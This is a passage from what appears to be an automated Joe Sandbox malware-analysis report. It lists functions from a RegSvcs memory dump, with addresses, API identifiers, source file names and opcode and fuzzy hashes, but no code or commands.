                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 9dad97bb087564c75613ba366f99e50b076b29da2716174f9e10720b160d3518
                                                                                            • Instruction ID: adec3ee36b37753a482a78c3f79573bbef1a76cef334ced5cb3d5a7288aedaa2
                                                                                            • Opcode Fuzzy Hash: 9dad97bb087564c75613ba366f99e50b076b29da2716174f9e10720b160d3518
                                                                                            • Instruction Fuzzy Hash: 3C22AE707066A1CBEB65CF2DC454376BBE1BF44300F08889AE9D68B28AD73DD552DB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F76A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8718abc02b697b5bd2fea8b24ab09888f7440ca0c8a162200da31adca8f62ed0
                                                                                            • Instruction ID: 13bbaeefff496d34d84d4548e08d6c5b850975253f0a87352c2eef7bc8966525
                                                                                            • Opcode Fuzzy Hash: 8718abc02b697b5bd2fea8b24ab09888f7440ca0c8a162200da31adca8f62ed0
                                                                                            • Instruction Fuzzy Hash: 96328B71A00605DFDB25CF68C880BAAB7F2FF48310F24856AE959EB351D735AC41EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F80770 Relevance: 1.9, APIs: 1, Instructions: 414COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a458fb119adb1e6315ee747f8ff0dea5fe7c0a95dd8e2002c9eee899b5dfc409
                                                                                            • Instruction ID: 2e019467960ef2a9826a7fc7336cfaad282e880e1d66b22962a93d6d2dbb9f80
                                                                                            • Opcode Fuzzy Hash: a458fb119adb1e6315ee747f8ff0dea5fe7c0a95dd8e2002c9eee899b5dfc409
                                                                                            • Instruction Fuzzy Hash: 4BF1DF31B00A05DFDB24DF68C884BAAB7B6FF44710F248169E4569B391DB34ED85EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01020274 Relevance: 1.8, APIs: 1, Instructions: 348timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: aee0ebaf540824922077953dd2fd9976923fba291a11cde493e098b9415f760b
                                                                                            • Instruction ID: c6b7d2bd6f5f0e722813e1bb541f130143cf81d17a6ed0f059738a352a420a68
                                                                                            • Opcode Fuzzy Hash: aee0ebaf540824922077953dd2fd9976923fba291a11cde493e098b9415f760b
                                                                                            • Instruction Fuzzy Hash: 45D1E0316007A5DFDB22DF68C845AAEBBF1FF4A704F088099F5859B666C739D980DB10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b8827964e158724c7c0be760516d1fc627ae2ec4ebcbf778ed9810b2f9818a47
                                                                                            • Instruction ID: 5b7df569dd4010cf74d86d4e4a5fa41b8d43c7f9f678f0655298b74c23f53e99
                                                                                            • Opcode Fuzzy Hash: b8827964e158724c7c0be760516d1fc627ae2ec4ebcbf778ed9810b2f9818a47
                                                                                            • Instruction Fuzzy Hash: 44A12832E002589FEF21DB98CC44FAEB7B5AF00724F190126E951AB3D1D7789D44EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F803E9 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID:
                                                                                            • API String ID: 48624451-0
                                                                                            • Opcode ID: 70cc7fcbd7559688d9577e810cda32bf55cd91facdb967b92659a5de8ce444c5
                                                                                            • Instruction ID: 71d74badbfa61a78bf512f82c957ecd1c95508752c4e600574018967353af6fa
                                                                                            • Opcode Fuzzy Hash: 70cc7fcbd7559688d9577e810cda32bf55cd91facdb967b92659a5de8ce444c5
                                                                                            • Instruction Fuzzy Hash: 3F714D72E0114A9FDB01EF98C991BEEB7F9AF08744F144065E905E7252EB38EE05DB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA29F9 Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 5288463be45af12578a698e3eed17e1e93ba014672dc1ae08dec388deb83c524
                                                                                            • Instruction ID: b07b2b62d0bfc6a1c20a2987efb6c4b4efc490285c76ace812f14159b0b2c607
                                                                                            • Opcode Fuzzy Hash: 5288463be45af12578a698e3eed17e1e93ba014672dc1ae08dec388deb83c524
                                                                                            • Instruction Fuzzy Hash: 740262F2D002689BDB71DB15CC81BDDB7B8AF45724F0041EAA609A7241EB349F84EF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6645D Relevance: 1.6, APIs: 1, Instructions: 150timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 00F6656C
                                                                                              • Part of subcall function 00F665B5: RtlDebugPrintTimes.NTDLL ref: 00F66664
                                                                                              • Part of subcall function 00F665B5: RtlDebugPrintTimes.NTDLL ref: 00F666AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: ddf528e98ac3cb556f85194c68308ba0d6dbc57270953485627bd1b6decf2b11
                                                                                            • Instruction ID: 35949154688e75eb75821a6c58d8f0d398e7fd32b7bc4729258e3d56bb397e5f
                                                                                            • Opcode Fuzzy Hash: ddf528e98ac3cb556f85194c68308ba0d6dbc57270953485627bd1b6decf2b11
                                                                                            • Instruction Fuzzy Hash: 4C51AEB12083019FD320DF24DD46FAB77E4BB84754F14091DF9869B1A1DA79E904AB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAC720 Relevance: 1.6, APIs: 1, Instructions: 141timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 5fa2e515d68565d17b6f2b000da23abd61735673b0f6487ad364d97c82315ba6
                                                                                            • Instruction ID: 3a262e8b87325d03268a94446f118c43ca641cf6be3127210c80acaf5594b47e
                                                                                            • Opcode Fuzzy Hash: 5fa2e515d68565d17b6f2b000da23abd61735673b0f6487ad364d97c82315ba6
                                                                                            • Instruction Fuzzy Hash: 0F41C4B1544304ABC730EB64DD45B5B77E8EF49B60F04452AF988D7261EB79EC00ABD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9EBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b185a4c77535f5debc91b1e414bd9f32f28e2be01b638f676cae4c08d106660a
                                                                                            • Instruction ID: ec6afddbebefce271f9b7664ef2bbf0cf64251a8fdaf9e5cd24944a3d91ebc4b
                                                                                            • Opcode Fuzzy Hash: b185a4c77535f5debc91b1e414bd9f32f28e2be01b638f676cae4c08d106660a
                                                                                            • Instruction Fuzzy Hash: 8E4182726043019FEB24DF24C840A5AB7E6FF48324F14492AE597C7712DB35E848EB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 307e73f734788ce9bb7f423b542bb0593cdf47ef27834e17d82924ab98f4d6ec
                                                                                            • Instruction ID: 0a4f12766ef6c6d813ef3c896015712b9df9d3da158eb050a71e51b501528e16
                                                                                            • Opcode Fuzzy Hash: 307e73f734788ce9bb7f423b542bb0593cdf47ef27834e17d82924ab98f4d6ec
                                                                                            • Instruction Fuzzy Hash: DC419171901700CFCB65EF24CA41B55B7F6FF44320F10C26BD44A9B2A1EB34A941EB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF07C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 2347b69f5db6a4a23d98f54e3e8192590228dd12efb6a463433f3dd4df557e3f
                                                                                            • Instruction ID: 13b35919e9b1c6abe52f1a278a6883026137614608c406b8dc6244ee70542576
                                                                                            • Opcode Fuzzy Hash: 2347b69f5db6a4a23d98f54e3e8192590228dd12efb6a463433f3dd4df557e3f
                                                                                            • Instruction Fuzzy Hash: 2B4190B15043059BD720DF24C845BABBBE8FF88760F004A2EF598C7291DB749804DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9245A Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 46586d1965132bd6a90c2527484954702af166c3b702faf8fef12ced554af14a
                                                                                            • Instruction ID: dffb4903c0f0a9bfaec11b9029a92611717c819f05e5e9d2068fdf3e622350d3
                                                                                            • Opcode Fuzzy Hash: 46586d1965132bd6a90c2527484954702af166c3b702faf8fef12ced554af14a
                                                                                            • Instruction Fuzzy Hash: A6317B72A00201EFDB30DF69DC81A6A77B5FB80B14F29011AF9456B365C7799C41E782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F74859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: a0541abbb0a2334d2176d7e021b101f49a5cbe0c38fa89adbeee8e444a6901b7
                                                                                            • Instruction ID: f766902cc19744e5aafd42a20277425acb81bc9b381cd9ab39a21efdf9b9149a
                                                                                            • Opcode Fuzzy Hash: a0541abbb0a2334d2176d7e021b101f49a5cbe0c38fa89adbeee8e444a6901b7
                                                                                            • Instruction Fuzzy Hash: 6641D6716003058BC725DF18D844B27B7F9EF81760F14842EF6598B2A1DB75ED41DB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101EBD0 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: dc3aad5e3dc51fc6fac0c6cce727747ab80c20c8007365adbc3bed547e7bb0f3
                                                                                            • Instruction ID: d1d3686f32ae2a8a1604d53e3d28c076bb37c7cabac8ef6a8edc801a809519f5
                                                                                            • Opcode Fuzzy Hash: dc3aad5e3dc51fc6fac0c6cce727747ab80c20c8007365adbc3bed547e7bb0f3
                                                                                            • Instruction Fuzzy Hash: 72317C715053068FC712EF19C94085ABBF5FF89614F0449AEE8C89B256D3359945CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F68A00 Relevance: 1.6, APIs: 1, Instructions: 85timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: e887c186995ab8b698c2b7246de6ee2983873680522a0b92b72dfed1362430f0
                                                                                            • Instruction ID: 989621099ad7f9a851f098fde657534d9ce3c57caea954598fcfbc69b8c07dfd
                                                                                            • Opcode Fuzzy Hash: e887c186995ab8b698c2b7246de6ee2983873680522a0b92b72dfed1362430f0
                                                                                            • Instruction Fuzzy Hash: 6231E4B6A00606EFCB11DFA0DA41BADB7B0BF48310F14425EEC0257651CB39A951FBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01044B00 Relevance: 1.6, APIs: 1, Instructions: 57timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 28b6d82724ef4aa066e22ded2b7ed831c18e148f58d14c504f4de301c80a0663
                                                                                            • Instruction ID: dbe9bf16770569d04acb38cb29eebb7e19884224bc945be01328d46d229ce2f4
                                                                                            • Opcode Fuzzy Hash: 28b6d82724ef4aa066e22ded2b7ed831c18e148f58d14c504f4de301c80a0663
                                                                                            • Instruction Fuzzy Hash: 6511C276200A119FD7629A29DC84F66B7E6FFC4710F154579EAC2C7690DA30E802CBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF892A Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8262a2ecc10831351cbf1f81914afc7ec5f655d5ea5f0f3a79561d485b3bdef
                                                                                            • Instruction ID: 34b07d0eff3eff43983c091b6fe15f96a093286c3c7be18cbe514cf07bfd8835
                                                                                            • Opcode Fuzzy Hash: c8262a2ecc10831351cbf1f81914afc7ec5f655d5ea5f0f3a79561d485b3bdef
